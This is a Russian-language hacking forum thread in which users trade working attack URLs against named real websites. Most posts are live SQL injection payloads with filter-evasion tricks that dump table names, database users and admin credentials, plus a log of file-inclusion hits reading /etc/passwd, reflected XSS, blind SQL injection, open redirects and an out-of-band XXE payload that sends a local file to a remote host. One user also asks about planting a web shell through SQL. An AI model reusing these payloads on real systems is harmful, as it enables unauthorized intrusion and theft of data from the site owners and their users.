Уязвимости SQLi, XSS и другие.

Давно созрел вопрос, да только все никак руки не "доходили". Можно ли залить шелл вместо "load_file('/etc/passwd')"? Просто пока не понимаю, почему срабатывает php в SQL иньекции...

 

php тут не причем, mysql поддерживает работу с файловой системой
https://www.w3resource.com/mysql/string-functions/mysql-load_file-function.php
https://dev.mysql.com/doc/refman/5.7/en/select-into.html

 

Спасибо. Век живи, век учись.

 

Я кодинге не очень силен, но таковы правила форума и писать я могу только здесь. Помогите набрать 5 репутации

 

PHP:

http://www.handelingsgerichtwerken.be/bestanden/download.php?id=69'+and+false+union select null,2,3,4,group_concat(0x202020,table_name,0x3c3e,column_name)+from information_schema.columns+where table_schema=database()+--+-

 

Code:

http://www.saifaiims.com/download.php?filename=../config/configuration.php

 

Code:

http://www.baikap.de/index2.php?include=/etc/passwd&id=85&language=E|LFI|[DE] Germany|12/21/2017 05:38:42
http://www.avionews.it/index.php?corpo=/etc/passwd&news_id=1207340&pagina_chiamante=index.php|LFI|[IT] Italy|12/22/2017 06:51:05
https://drbl.org/management/techrpt.php?c=../../../../../etc/passwd&t=Start, restart or stop DRBL-related services|LFI|[JP] Japan|12/23/2017 06:10:26
http://caiana.caia.org.ar/template/caiana.php?pag=../../../../../etc/passwd&vol=3|LFI|[AR] Argentina|12/23/2017 08:47:59
http://www.energetica-india.net/download.php?seccion=articles&archivo=../../../../../../../../etc/passwd|LFI|[ES] Spain|12/23/2017 08:52:43
http://www.mcu.es/deportebase/cgi/um?M=/d7/f7&O=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00&N=&L=0|LFI|[ES] Spain|12/23/2017 09:00:57
https://www.txregionalcouncil.org/display.php?page=/etc/passwd|LFI|[US] United States|12/23/2017 09:10:58
http://www.basegroup.su/index.php?Page=http%3a%2f%2fwww.google.com|RFI|[RU] Russian Federation|12/23/2017 09:58:38
http://www.iatvt.ru/index.cgi?doc=../../../../../../etc/passwd%00|LFI|[RU] Russian Federation|12/23/2017 10:54:42
http://www.musifratz.de/content.php?seite=/etc/passwd&rubrik=kinderkultur&ansicht=projekte|LFI|[DE] Germany|12/23/2017 11:13:42

 

PHP:

http://www.bpc.gov.bd/contactus.php?id=4439'+/*!12345UNiOn*/%0ASeLEct+1,2,/*!50000user()*/,4,5,6,7+--+_
ebfashion.com.bd/index.php?id=-8'+UnIoN+SeLEcT+1,user(),2+--+-
http://www.vertexhome.co.il/pageE.php?id=110+UnIon+SeLEct+1,2,3,4,5,6,7,8,9,group_concat(table_name),11 from information_schema.tables where table_schema=database()+--+-
http://foundation.sigmachi.org/station.php?id=wtg'+and+false+UnIon%0ASeLEct+1,user(),3,4,5,6+--+_
http://www.commongroundnews.org/article.php?id=-32240'+/*!12345UnIoN%0ASeLEcT*/+1,2,user(),4,(/*!12345SELECT*/+/*!12345GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+/*!50000INFORMATION_SCHEMA.TABLES*/+WHERE+TABLE_SCHEMA=DATABASE()),6,7,8,9,10,11,12,131,4,15,15,15,15,15,16,16,22+--+-&lan=ba&sp=1
http://oppodigital.in/product-details.php?id=9 and false UNiOn+SElEcT @,@,@,@,@,@,@,@,group_concat(table_name),@ from information_schema.tables #


HTML:

https://depositfiles.od.ua/tools/httpheaders.php

 

HTML:

http://www.tnla.com/events.php?id=38+UNION+SELECT+1,concat(username,password)+from+tnlacom_tnla.admin_users+--+

 

Провайдер Электронный щит.
Локальная XSS.

Code:

http://wwwcom.ru/connect.php/%22%3E%3Cscript%3Ealert('Tayler(Mexel)')%3C/script%3E

 

target: http://www.premium-network.ru
type: Time-based, Error-based
user: forumpt@localhost1
version: 5.5.371

Time-based:

Code:

www.premium-network.ru/index.php?id=sktv_news&ns=70'+and+if(substring(version(),1,1)=5,SLEEP(15),1)--+

Error-based:

Code:

http://www.premium-network.ru/index.php?id=sktv_news&ns=70%27%20union%20select%20count(*),concat(version(),floor(rand(0)*2))x,2,3%20from%20information_schema.tables%20group%20by%20x--+

 

OOB XXE

Code:

http://www.xmlforasp.net/SchemaValidator.aspx

XML Payload:

Code:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE test SYSTEM "http://host/file.dtd">
<data>&test;</data>

.dtd File:

Code:

<!ENTITY % file SYSTEM "file:///Windows/system32/drivers/etc/services">
<!ENTITY % all "<!ENTITY send SYSTEM '?%file;'>">
%all;

 

Лайк тому кто попробует сделать с выводом, не люблю я слепые, OOB приветствуется.Точку входа не менять желательно.

 

Code:

70('UNION ALL SELECT 1,2,version(),3-- a)---

Вывод в мета-теге:

Code:

<META NAME="description" CONTENT="Последние новости, события и объявления для абонентов сети кабельного телевидения и Интернет Premium Net. 3 5.5.37">

 

Code:

<META NAME="keywords" CONTENT="Новости Пушкино Красноармейск Premium Net 4 5.5.37">

70'+union+select+1,version(),3,4--+
Тут же банально все, зачем скобки?

 

PHP:

http://www.boxofficemojo.com/.htaccess
view-source:http://www.boxofficemojo.com/maintenance.html

 

Sql Injection

Code:

http://www.ceadir-lunga.md/index.php?prm=999%27+UNION+ALL+SELECT+version()+--+&mid=201
http://retrofilms.in/forum/feedcat.php?id=2%27+union+all+select+1,2,3,4,5,6,7,8,9+--+

Мда редкость

Code:

http://katalogshop.md/tmp/

 

HTML:

http://pravoslavsad4.ru/view_index21b.php?id=-1%27%20UnIon%20SeLEct%201%2C2%2C3%2C4%2C5%2C6%2C0x3c7363726970743e616c65727428646f63756d656e742e646f6d61696e293c2f7363726970743e%20--%20-

 

Что не получается? П.С только сейчас увидел ты это аттак

PHP:

http://атаксупермаркет.рф/goods.aspx?id=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES +WHERE+TABLE_NAME+NOT+IN+('yml_catalog','shop','email','currencies','currency','categories','category','offers','offer','categoryId','picture','orderingTime','onstock','ordering'))+--+

Дальше сам

HTML:

https://rdot.org/forum/showthread.php?t=826

 

HTML:

https://www.mournhockey.com.ua/go.php?http://FFFFFFF.org
http://iz.com.ua/engine/go.php?url=aHR0cDovL2dvb2dMZS5jb20=

OpenRedirect

HTML:

https://bosa.in.ua/event/?id=1'+and+false+%55%6e%49%6f%4e+%2f%2a%21%31%32%33%34%35%53%65%4c%45%63%74%2a%2f+1,user(),3,4,5,6,7,8,9,database(),1,2,3,4,5,6,7,8,9,0,1,2,3,4,version(),6,7,8,9,0,1+--+-